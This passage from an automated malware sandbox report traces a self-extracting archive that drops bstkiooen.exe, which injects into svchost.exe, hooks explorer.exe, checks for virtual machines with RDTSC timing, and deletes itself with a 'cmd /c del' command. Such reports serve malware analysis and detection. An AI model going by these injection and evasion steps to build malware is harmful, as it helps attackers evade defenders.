            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0041E544
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0041ED4C
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_00402D90
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_00409E5B
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_00409E60
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_00402FB0
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: String function: 00C7F5F0 appears 31 times
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: String function: 00C7EB78 appears 39 times
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: String function: 00C7EC50 appears 56 times
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: String function: 0164B150 appears 32 times
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 1_2_00BD043D GetTempFileNameW, NtSetInformationFile, NtWriteFile, CreateProcessInternalW, GetThreadContext, SetThreadContext, GetThreadContext
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 1_2_00BD07DF NtOpenFile
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689540 NtReadFile, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689910 NtAdjustPrivilegesToken, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_016895D0 NtClose, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_016899A0 NtCreateSection, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689860 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689840 NtDelayExecution, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_016898F0 NtReadVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689710 NtQueryInformationToken, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_016897A0 NtUnmapViewOfSection, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689780 NtMapViewOfSection, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689660 NtAllocateVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689A50 NtCreateFile, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689A20 NtResumeThread, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689A00 NtProtectVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_016896E0 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689560 NtWriteFile
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689950 NtQueueApcThread
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689520 NtWaitForSingleObject
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0168AD30 NtSetContextThread
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_016895F0 NtQueryInformationFile
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_016899D0 NtCreateProcessEx
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0168B040 NtSuspendThread
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689820 NtEnumerateKey
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_016898A0 NtWriteVirtualMemory
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689760 NtOpenProcess
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689770 NtSetInformationFile
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0168A770 NtOpenThread
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689730 NtQueryVirtualMemory
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689B00 NtSetValueKey
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0168A710 NtOpenProcessToken
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01689FE0 NtCreateMutant
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0168A3B0 NtGetContextThread
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689670 NtQueryInformationProcess,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689650 NtQueryValueKey,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689610 NtEnumerateValueKey,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689A10 NtQuerySection,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016896D0 NtCreateKey,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689A80 NtOpenDirectoryObject,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A360 NtCreateFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A410 NtReadFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A490 NtClose,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A35A NtCreateFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A3B2 NtCreateFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A40A NtReadFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A48B NtClose,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A53A NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C66FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
            Source: F61A.tmp.1.drStatic PE information: No import functions for PE file found
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeSection loaded: dxgidebug.dll
            Source: F61A.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: F61A.tmp.1.drStatic PE information: Section .text
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeFile read: C:\Users\user\Desktop\primosdv3.1.1.0.exeJump to behavior
            Source: primosdv3.1.1.0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\primosdv3.1.1.0.exe C:\Users\user\Desktop\primosdv3.1.1.0.exe
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeProcess created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeProcess created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7139109Jump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@2/2
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C66C74 GetLastError,FormatMessageW,
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_01
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCommand line argument: sfxname
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCommand line argument: sfxstime
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCommand line argument: STARTDLG
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: primosdv3.1.1.0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: primosdv3.1.1.0.exe
            Source: Binary string: wntdll.pdbUGP source: bstkiooen.exe, 00000001.00000003.255333801.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000001.00000003.253799569.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: bstkiooen.exe, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
            Source: primosdv3.1.1.0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: primosdv3.1.1.0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: primosdv3.1.1.0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: primosdv3.1.1.0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: primosdv3.1.1.0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7F640 push ecx; ret
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7EB78 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0169D0D1 push ecx; ret
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_00417B13 push edi; retf
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041D4B5 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_00417D68 push edx; ret
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041D56C push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041D502 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0041D50B push eax; ret
            Source: primosdv3.1.1.0.exe Static PE information: section name: .didat
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7139109
            Source: initial sample Static PE information: section name: .text entropy: 7.410591725114109
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe File created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe File created: C:\Users\user\AppData\Local\Temp\F61A.tmp

            Hooking and other Techniques for Hiding and Protection

            Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE6
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\F61A.TMP
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000002D79904 second address: 0000000002D7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000002D79B7E second address: 0000000002D79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\explorer.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F61A.tmp
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01686DE6 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe API coverage: 9.3 %
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7E6A3 VirtualQuery,GetSystemInfo,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C8B348 FindFirstFileExA,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe API call chain: ExitProcess graph end node
            Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
            Source: explorer.exe, 00000003.00000000.304900101.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
            Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
            Source: explorer.exe, 00000003.00000000.334006724.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
            Source: explorer.exe, 00000003.00000000.299904671.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
            Source: explorer.exe, 00000003.00000000.334006724.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: explorer.exe, 00000003.00000000.284751375.000000000F62F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft Sto
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C8C030 GetProcessHeap,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01686DE6 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C87DEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 1_2_00BD007A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 1_2_00BD0019 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 1_2_00BD0149 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 1_2_00BD0005 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01683D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01667D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01718D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01664120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016CA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]
